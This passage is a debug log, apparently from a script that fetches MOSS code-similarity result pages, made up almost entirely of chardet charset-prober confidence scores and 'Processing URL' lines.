0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.525936079231927\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5596201539189024\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match99-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match99-0.html\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.560693316674975\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match105-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match105-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match99-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match105-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match101-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match101-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match101-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24830\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 15947\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 15934\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24817\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 15947\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24830\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 15934\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24817\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40769\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 15934\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24817\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 15935\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40756\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24818\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 15934\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40769\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24817\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40756\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40756\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40757\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40756\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5484756545867975\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5307566789403784\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5579402336840317\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match100-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match100-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match100-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match102-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match102-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match102-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match104-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match104-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match104-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21468\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19571\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25760\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21455\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25747\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21468\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25760\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21455\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19572\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25747\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21455\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19571\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25747\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21456\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25748\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21455\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25747\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5669653179249773\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.55965291689788\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5338923655373736\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5297635729864526\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5398265559519746\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match106-top.html\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match106-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match106-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match107-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match107-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match107-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match103-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match103-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match103-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31297\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31284\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31297\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31284\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match108-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31284\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match108-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match108-1.html\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31285\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31284\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40586\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19108\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19095\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19108\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40586\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19095\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19095\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19096\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19095\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5269708118442129\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 